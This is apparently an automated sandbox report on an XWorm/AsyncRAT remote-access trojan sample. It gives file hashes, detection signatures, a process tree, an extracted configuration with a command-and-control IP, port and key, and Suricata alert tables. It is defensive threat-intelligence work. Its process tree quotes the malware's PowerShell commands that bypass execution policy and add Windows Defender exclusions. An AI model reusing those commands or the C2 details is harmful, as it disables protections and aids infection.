Windows Analysis Report
THITWNSEI24112908089786756456545346568789-00010.scr.exe

Overview

General Information

Sample name: THITWNSEI24112908089786756456545346568789-00010.scr.exe
Analysis ID: 1566987
MD5: dd81e5afcd1a13eee9f9a28c6cde2a56
SHA1: cf99a76fc406ffd81c62fbf07bd65c80eeae293f
SHA256: b399f5d239807fe144ad8872b4111002ebc6bb79ea6faa417db37f5ff95100ee
Tags: AsyncRAT, exe, user-threatcat_ch

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • THITWNSEI24112908089786756456545346568789-00010.scr.exe (PID: 4916 cmdline: "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe" MD5: DD81E5AFCD1A13EEE9F9A28C6CDE2A56)
    • THITWNSEI24112908089786756456545346568789-00010.scr.exe (PID: 3564 cmdline: "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe" MD5: DD81E5AFCD1A13EEE9F9A28C6CDE2A56)
      • powershell.exe (PID: 5960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'THITWNSEI24112908089786756456545346568789-00010.scr.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 1176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malware configuration (extracted): {"C2 url": ["104.250.180.178"], "Port": 7061, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Yara matches in memory dumps
Source | Rule | Description | Author | Strings
00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xcb33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xcbd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xcce5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xc14d:$cnc4: POST / HTTP/1.1
00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x16e67:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6e177:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x872fb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x16f04:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6e214:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x87398:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x17019:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6e329:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x874ad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x16481:$cnc4: POST / HTTP/1.1
  • 0x6d791:$cnc4: POST / HTTP/1.1
  • 0x86915:$cnc4: POST / HTTP/1.1

Yara matches in unpacked PE files
Source | Rule | Description | Author | Strings
0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xaf33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xafd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xb0e5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xa54d:$cnc4: POST / HTTP/1.1
3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xcd33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xcdd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xcee5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xc34d:$cnc4: POST / HTTP/1.1
0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

              System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe", ParentImage: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe, ParentProcessId: 3564, ParentProcessName: THITWNSEI24112908089786756456545346568789-00010.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', ProcessId: 5960, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe", ParentImage: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe, ParentProcessId: 3564, ParentProcessName: THITWNSEI24112908089786756456545346568789-00010.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', ProcessId: 5960, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe", ParentImage: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe, ParentProcessId: 3564, ParentProcessName: THITWNSEI24112908089786756456545346568789-00010.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', ProcessId: 5960, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe, ProcessId: 3564, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe", ParentImage: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe, ParentProcessId: 3564, ParentProcessName: THITWNSEI24112908089786756456545346568789-00010.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', ProcessId: 5960, ProcessName: powershell.exe
Suricata alerts, SID 2852870 (server to client)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-02T22:05:43.176015+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:05:44.790619+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:05:55.884093+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:06.994799+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:13.138814+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:18.105775+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:29.234953+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:33.158204+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:39.610174+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:41.029021+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:41.268597+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:43.128361+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:43.628687+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:44.488521+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:46.578848+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:48.988967+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:00.435045+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:10.690522+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:12.908911+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:13.148654+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:18.263880+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:23.913779+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:28.501242+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:28.740956+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:28.978533+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:29.219260+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:37.278608+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:39.555199+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:43.140971+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:44.372757+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:49.482576+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:49.718348+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:50.008027+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:59.940548+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:00.271031+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:00.543720+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:05.428683+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:13.145222+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:16.208356+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:27.338646+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:36.499975+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:40.998799+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:41.258519+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:43.139674+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:43.438469+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:50.521751+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:09:02.341593+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:09:08.038302+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
Suricata alerts, SID 2852923 (client to server)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-02T22:05:44.792711+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:05:55.885979+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:07.009201+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:18.129003+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:29.243496+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:33.249214+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:39.614440+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:41.030624+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:41.270089+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:41.572434+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:43.630432+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:44.492086+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:46.585300+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:06:48.990594+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:00.440880+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:10.692084+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:12.915369+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:13.403770+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:13.920690+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:18.266927+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:23.922106+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:28.502759+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:28.743182+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:28.983451+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:29.221134+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:37.285940+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:39.557443+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:44.374746+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:49.491448+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:49.719946+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:50.009606+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:07:59.947483+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:00.275330+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:00.545398+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:05.431454+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:16.212491+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:27.342286+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:36.503489+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:41.001640+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:41.260237+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:43.440421+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:08:50.527074+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
